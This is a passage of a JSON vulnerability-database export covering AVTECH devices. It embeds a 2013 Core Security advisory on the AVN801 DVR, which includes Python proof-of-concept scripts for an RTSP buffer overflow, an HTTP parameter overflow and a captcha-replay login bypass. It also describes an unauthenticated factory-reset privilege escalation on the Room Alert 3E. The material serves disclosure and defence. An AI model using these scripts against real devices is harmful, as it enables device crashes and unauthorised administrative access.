"data": "Buffer overflow in cgi-bin/user/Config.cgi in AVTECH AVN801 DVR with firmware 1017-1003-1009-1003 and earlier, and possibly other devices, allows remote attackers to cause a denial of service (device crash) and possibly execute arbitrary code via a long string in the Network.SMTP.Receivers parameter. AVTECH AVN801 is a digital video recorder product. A buffer overflow vulnerability exists in AVTECH AVN801 \u0027/cgi-bin/user/Config.cgi\u0027. No authentication is required. A remote attacker can exploit the vulnerability to execute arbitrary code through a specially crafted HTTP POST request. AVTECH AVN801 is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts may result in a denial-of-service condition. \nAVTECH AVN801 running firmware version 1017-1003-1009-1003 is vulnerable. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAVTECH DVR multiple vulnerabilities\n\n\n1. *Advisory Information*\n\nTitle: AVTECH DVR multiple vulnerabilities\nAdvisory ID: CORE-2013-0726\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities\nDate published: 2013-08-28\nDate of last update: 2013-08-28\nVendors contacted: AVTECH Corporation\nRelease mode: User release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper\nAccess Control [CWE-284]\nImpact: Code execution, Security bypass\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982\n\n\n3. *Vulnerability Description*\n\nMultiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and\npotentially other devices sharing the affected firmware) that could\nallow a remote attacker:\n\n 1. \n 2. \n 3. [CVE-2013-4982] To bypass the captcha of the administration login\nconsole enabling several automated attack vectors. \n\n\n4. *Vulnerable Packages*\n\n . DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked. \n\n\n5. *Vendor Information, Solutions and Workarounds*\n\nThere was no official answer from AVTECH support team after several\nattempts (see [Sec. 8]); contact vendor for further information. Some\nmitigation actions may be:\n\n . Do not expose the DVR to internet unless absolutely necessary. Have at least one proxy filtering the \u0027SETUP\u0027 parameter in RTSP\nrequests. Have at least one proxy filtering the \u0027Network.SMTP.Receivers\u0027\nparameter in HTTP requests to \u0027/cgi-bin/user/Config.cgi\u0027. \n\n\n6. *Credits*\n\n[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core\nSecurity Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were\ndiscovered and researched by Facundo Pantaleo from Core Security\nConsulting Team. \n\n\n7. *Technical Description / Proof of Concept Code*\n\n\n7.1. *Buffer Overflow in RTSP Packet Handler*\n\n[CVE-2013-4980] The following Python script sends a specially crafted\npacket that triggers a buffer overrun condition when handling the RTSP\ntransaction; no authentication is required. As a result, the device\ncrashes and it could possibly lead to a remote code execution. \n\n/-----\nimport socket\n\nHOST = \u0027192.168.1.1\u0027\nPORT = 554 \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\ntrigger_pkt = \"SETUP\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS\nRTSP/1.0\\r\\n\"\ntrigger_pkt += \"CSeq: 1\\r\\n\"\ntrigger_pkt += \"User-Agent: VLC media player (LIVE555 Streaming Media\nv2010.02.10)\\r\\n\\r\\n\"\nprint \"[*] Sending trigger\"\ns.sendall(trigger_pkt)\ndata = s.recv(1024)\nprint \u0027[*] Response:\u0027, repr(data), \"\\r\\n\"\ns.close()\n-----/\n\n\n7.2. As a result, the\ndevice crashes and it would possible lead to a remote code execution. \n\n\n/-----\nimport httplib\n\nip = \"192.168.1.1\"\nconn = httplib.HTTPConnection(ip)\nconn.request(\"POST\",\n\"/cgi-bin/user/Config.cgi?action=set\u0026Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nHTTP/1.1\")\nresp = conn.getresponse()\nprint resp.read()\n-----/\n\n\n7.3. *CAPTCHA Bypass*\n\n[CVE-2013-4982] The following Python proof of concept sends a wrong\ncaptcha in first place (just to verify that captcha protection is\nenabled); then, it sends ten requests with an arbitrary hardcoded\ncaptcha and its matching verification code. As a result, the captcha\nprotection can by completely bypassed. \n\n\n/-----\nimport httplib\n\nip = \"192.168.1.1\"\nprint \"Performing captcha replay with hardcoded wrong captcha code and\nverify code...\"\nconn = httplib.HTTPConnection(ip)\nconn.request(\"GET\",\n\"/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=\u0026captcha_code=FMUA\u0026verify_code=FMUYyLOivRpgc\nHTTP/1.1\")\nresp = conn.getresponse()\nprint \"Reading webpage...\"\nprint resp.read()\nprint \"Performing several captcha replays with hardcoded right captcha\ncode and verify code...\"\nfor i in range(1, 10):\n conn = httplib.HTTPConnection(ip)\n conn.request(\"GET\",\n\"/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=\u0026captcha_code=FMUF\u0026verify_code=FMUYyLOivRpgc\nHTTP/1.1\")\n resp = conn.getresponse()\n print \"Reading webpage...\"\n print resp.read()\n\n-----/\n\n\n8. *Report Timeline*\n\n. 2013-08-06:\nCore Security Technologies attempts to contact vendor using the AVTECH\nofficial technical support contact page [2]. No reply received. 2013-08-12:\nCore attempts to contact vendor. 2013-08-20:\nCore attempts to contact vendor. 2013-08-28:\nAfter 3 attempts to contact vendor, the advisory CORE-2013-0726 is\nreleased as \u0027user release\u0027. \n\n\n9. *References*\n\n[1] http://www.avtech.com.tw. \n[2]\nhttp://www.avtech.com.tw/index.php?option=com_content\u0026view=article\u0026id=244\u0026Itemid=453\u0026lang=en. \n\n\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n11. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2013 Core Security\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/. \n\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4981"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006100"
},
{
"db": "CNVD",
"id": "CNVD-2013-12807"
},
{
"db": "BID",
"id": "62037"
},
{
"db": "VULHUB",
"id": "VHN-64983"
},
{
"db": "PACKETSTORM",
"id": "122998"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-64983",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-64983"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-4981",
"trust": 3.5
},
{
"db": "OSVDB",
"id": "96693",
"trust": 2.5
},
{
"db": "BID",
"id": "62037",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006100",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201308-521",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-12807",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20130828 CORE-2013-0726 - AVTECH DVR MULTIPLE VULNERABILITIES",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "27942",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-64983",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "122998",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12807"
},
{
"db": "VULHUB",
"id": "VHN-64983"
},
{
"db": "BID",
"id": "62037"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006100"
},
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "NVD",
"id": "CVE-2013-4981"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
]
},
"id": "VAR-201403-0124",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12807"
},
{
"db": "VULHUB",
"id": "VHN-64983"
}
],
"trust": 1.3875
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12807"
}
]
},
"last_update_date": "2023-12-18T12:30:46.806000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AVN801",
"trust": 0.8,
"url": "http://www.avtech.com.tw/index.php?option=com_k2\u0026view=item\u0026id=71"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006100"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-64983"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006100"
},
{
"db": "NVD",
"id": "CVE-2013-4981"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities"
},
{
"trust": 2.5,
"url": "http://osvdb.org/96693"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2013/aug/284"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4981"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-4981"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/62037"
},
{
"trust": 0.3,
"url": "http://www.avtech.com.tw/index.php?option=com_k2\u0026view=item\u0026id=71"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4981"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4982"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.avtech.com.tw/index.php?option=com_content\u0026view=article\u0026id=244\u0026itemid=453\u0026lang=en."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4980"
},
{
"trust": 0.1,
"url": "http://www.avtech.com.tw."
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12807"
},
{
"db": "VULHUB",
"id": "VHN-64983"
},
{
"db": "BID",
"id": "62037"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006100"
},
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "NVD",
"id": "CVE-2013-4981"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-12807"
},
{
"db": "VULHUB",
"id": "VHN-64983"
},
{
"db": "BID",
"id": "62037"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006100"
},
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "NVD",
"id": "CVE-2013-4981"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12807"
},
{
"date": "2014-03-03T00:00:00",
"db": "VULHUB",
"id": "VHN-64983"
},
{
"date": "2013-08-28T00:00:00",
"db": "BID",
"id": "62037"
},
{
"date": "2014-03-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006100"
},
{
"date": "2013-08-28T23:44:44",
"db": "PACKETSTORM",
"id": "122998"
},
{
"date": "2014-03-03T16:55:04.177000",
"db": "NVD",
"id": "CVE-2013-4981"
},
{
"date": "2013-08-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12807"
},
{
"date": "2014-03-04T00:00:00",
"db": "VULHUB",
"id": "VHN-64983"
},
{
"date": "2013-08-28T00:00:00",
"db": "BID",
"id": "62037"
},
{
"date": "2014-03-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006100"
},
{
"date": "2014-03-04T16:51:53.970000",
"db": "NVD",
"id": "CVE-2013-4981"
},
{
"date": "2014-03-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AVTECH AVN801 DVR Firmware cgi-bin/user/Config.cgi Vulnerable to buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006100"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
],
"trust": 0.6
}
}
VAR-201907-0422
Vulnerability from variot - Updated: 2023-12-18 12:28On AVTECH Room Alert 3E devices before 2.2.5, an attacker with access to the device's web interface may escalate privileges from an unauthenticated user to administrator by performing a cmd.cgi?action=ResetDefaults&src=RA reset and using the default credentials to get in. AVTECH Room Alert 3E The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. AVTECH Software Room Alert 3E is a device used by AVTECH Software to monitor the IT infrastructure. This product is mainly used to monitor the temperature, humidity, power, electricity and smoke of computer rooms or small data centers.
There are security vulnerabilities in AVTECH Software Room Alert 3E prior to 2.2.5. An attacker could exploit this vulnerability to increase privileges
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0422",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "room alert 3e",
"scope": "lt",
"trust": 1.8,
"vendor": "avtech",
"version": "2.2.5"
},
{
"model": "software room alert 3e",
"scope": "lt",
"trust": 0.6,
"vendor": "avtech",
"version": "2.2.5"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-26823"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"db": "NVD",
"id": "CVE-2019-13379"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:avtech:room_alert_3e_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.5",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:avtech:room_alert_3e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-13379"
}
]
},
"cve": "CVE-2019-13379",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-13379",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-26823",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-13379",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-13379",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-26823",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-343",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-13379",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-26823"
},
{
"db": "VULMON",
"id": "CVE-2019-13379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"db": "NVD",
"id": "CVE-2019-13379"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-343"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "On AVTECH Room Alert 3E devices before 2.2.5, an attacker with access to the device\u0027s web interface may escalate privileges from an unauthenticated user to administrator by performing a cmd.cgi?action=ResetDefaults\u0026src=RA reset and using the default credentials to get in. AVTECH Room Alert 3E The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. AVTECH Software Room Alert 3E is a device used by AVTECH Software to monitor the IT infrastructure. This product is mainly used to monitor the temperature, humidity, power, electricity and smoke of computer rooms or small data centers. \n\nThere are security vulnerabilities in AVTECH Software Room Alert 3E prior to 2.2.5. An attacker could exploit this vulnerability to increase privileges",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-13379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"db": "CNVD",
"id": "CNVD-2019-26823"
},
{
"db": "VULMON",
"id": "CVE-2019-13379"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-13379",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006264",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-26823",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201907-343",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-13379",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-26823"
},
{
"db": "VULMON",
"id": "CVE-2019-13379"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006264"
},
{
"db": "NVD",
"id": "CVE-2019-13379"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-343"
}
]
},
"id": "VAR-201907-0422",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-26823"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
